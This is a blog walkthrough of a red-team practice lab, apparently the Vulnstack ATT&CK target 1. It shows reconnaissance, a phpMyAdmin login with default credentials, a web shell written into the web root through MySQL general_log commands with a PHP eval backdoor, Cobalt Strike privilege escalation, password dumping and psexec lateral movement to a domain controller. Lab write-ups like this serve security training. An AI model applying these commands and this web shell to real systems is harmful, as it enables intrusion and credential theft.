banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

ATT&CK Red Team Assessment Practical Target - 1

Introduction#

The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

A simple target environment originally intended for student assessments, but it was not utilized. The lateral domain penetration only used the psexec module from Cobalt Strike, and the main content is to familiarize oneself with some penetration processes.

Many vulnerabilities in the target environment could not be successfully reproduced due to some environmental issues, but the overall process is fine.

Environment Setup#

You need to disable accelerated 3D graphics; otherwise, the virtual machine cannot start.

image

The topology is as follows:

image

The network settings are as follows, using VMnet2 and VMnet8:

image

Web server (VM1) - Win7 (dual network card, NAT mode + vmnet2 (host-only))

image

IP: 192.168.111.128 and 192.168.52.143

Start phpstudy

image

DNS points to DC

image

Win2008 DC (VM3)

IP: 192.168.52.138

image

Win03 domain member (VM2)

IP: 192.168.52.141

image

View the current domain

image

Penetration Process#

Information Gathering#

Nmap Port Scanning#

image

image

Sword Scanning#

image

Directory Scanning#

image

phpinfo page

image

phpMyAdmin Login#

If the password is: root/root

image

phpMyAdmin Getshell#

Get shell through logs

Check if logging is enabled and the log storage location: SHOW VARIABLES LIKE "general_log%";
image

Enable logging: set global general_log='on';
Check if enabled: SHOW VARIABLES LIKE "general_log%"

image

Set the log file to a malicious file, first find the website directory

image

Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php';

Successfully set

image

After preparing the work, start writing the shell. You only need to query through SQL statements.

select "<?php @eval($_POST[cmd]);?>";

image

Access web shell:
http://192.168.111.128/ss.php

image

Ant Sword connection:

image

The website's port 80 is yxcms

image

Log in to the backend, and you can also execute SQL statements.

image

Web shell view IP address

image

Found dual network cards

Cobalt Strike Startup#

Go online to operate on Cobalt Strike.

Server

image

Client

Establish a listener

image

image

Generate payload

image

Upload the payload to Ant Sword for execution

image

Run exe, Cobalt Strike goes online.

image

Sleep 0

image

Shell whoami

image

Privilege Escalation#

Use getsystem on Cobalt Strike to elevate privileges and obtain system permissions.

image

Internal Network Information Collection#

image

Click target to find three machines. If nothing opens, scan the ports, and you will find them.

image

Dump hash

image

Obtain plaintext passwords

image

Lateral Movement#

After obtaining the password, use psexec for lateral movement. Here, the passwords for the three machines are the same; if they are different, lateral movement via SMB will not be possible.

image

Select psexec64, 64-bit

image

image

Obtain the domain controller server.

image

image

image

Using the same method to control the 141, the Win2003 domain member machine.

image

You need to select psexec, 32-bit

image

Check the IP

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.